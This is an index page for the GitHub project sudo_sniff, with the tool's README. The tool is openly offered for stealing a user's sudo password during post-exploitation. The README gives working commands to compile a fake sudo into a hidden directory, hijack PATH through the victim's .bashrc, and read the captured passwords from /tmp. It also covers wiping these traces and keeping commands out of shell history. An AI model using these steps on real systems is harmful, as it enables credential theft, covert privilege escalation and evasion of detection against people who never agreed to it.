Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/dubs3c/sudo_sniff
Steal user's password when running sudo for post-exploitation purposes
https://github.com/dubs3c/sudo_sniff
c password-sniffer post-exploitation
Last synced: 2 months ago
JSON representation
Steal user's password when running sudo for post-exploitation purposes
- Host: GitHub
- URL: https://github.com/dubs3c/sudo_sniff
- Owner: dubs3c
- Created: 2016-08-17T21:39:04.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2020-09-29T07:58:25.000Z (over 4 years ago)
- Last Synced: 2024-08-04T09:05:44.792Z (6 months ago)
- Topics: c, password-sniffer, post-exploitation
- Language: C
- Homepage:
- Size: 6.84 KB
- Stars: 38
- Watchers: 3
- Forks: 12
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-network-stuff - **11**星 - exploitation purposes (<a id="7bf0f5839fb2827fdc1b93ae6ac7f53d"></a>工具 / <a id="32739127f0c38d61b14448c66a797098"></a>嗅探&&Sniff)
README
# sudo_sniff
**sudo\_sniff** is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's `$PATH` in order to hijack sudo when executed by the user. This could be used in post-exploitation as an alternative route for acheiving root acces (given that the user has the correct permissions).
**sudo_sniff** will store both correct and incorrect password entries at the following location per default: `/tmp/.temp5678`
## Improvements
* ~~Hide the victim's input~~
* ~~Add function to either send the password to attacker or save it on disk.~~
* sudo may be in different locations on different systems, perhaps implement a function to locate it
* ~~[BUG] When the victim enters his input, the text asking for the password will be printed multiple times.~~
## Usage
```
hunter@nsa:~$ git clone [email protected]:mjdubell/sudo_sniff.git
hunter@nsa:~$ cd sudo_sniff/
hunter@nsa:~$ make
hunter@nsa:~$ ./sudo whoami
```
#### Post Exploitation
```
victim@server:~$ mkdir $HOME/.payload
victim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c
victim@server:~$ echo 'export PATH="$HOME/.payload:$PATH"' >> $HOME/.bashrc
```
*Note: Make sure `sudo` is executable.*
##### Cleanup
```
victim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH="$HOME\/\.payload:$PATH"/d' .bashrc > tmp && mv tmp .bashrc
```
*Note: If the HISTCONTROL environment variable is set to "ignorespace" or "ignoreboth", adding a space before the command will prevent it from showing up when running `history`.*
##### Retrieve the password
```
victim@server:~$ cat /tmp/.temp5678
victim:mypasword:ERROR
victim:mypassword:SUCCESS
```
## Contributing
1. Fork it!
2. Create your feature branch: `git checkout -b my-new-feature`
3. Commit your changes: `git commit -am 'Add some feature'`
4. Push to the branch: `git push origin my-new-feature`
5. Submit a pull request :D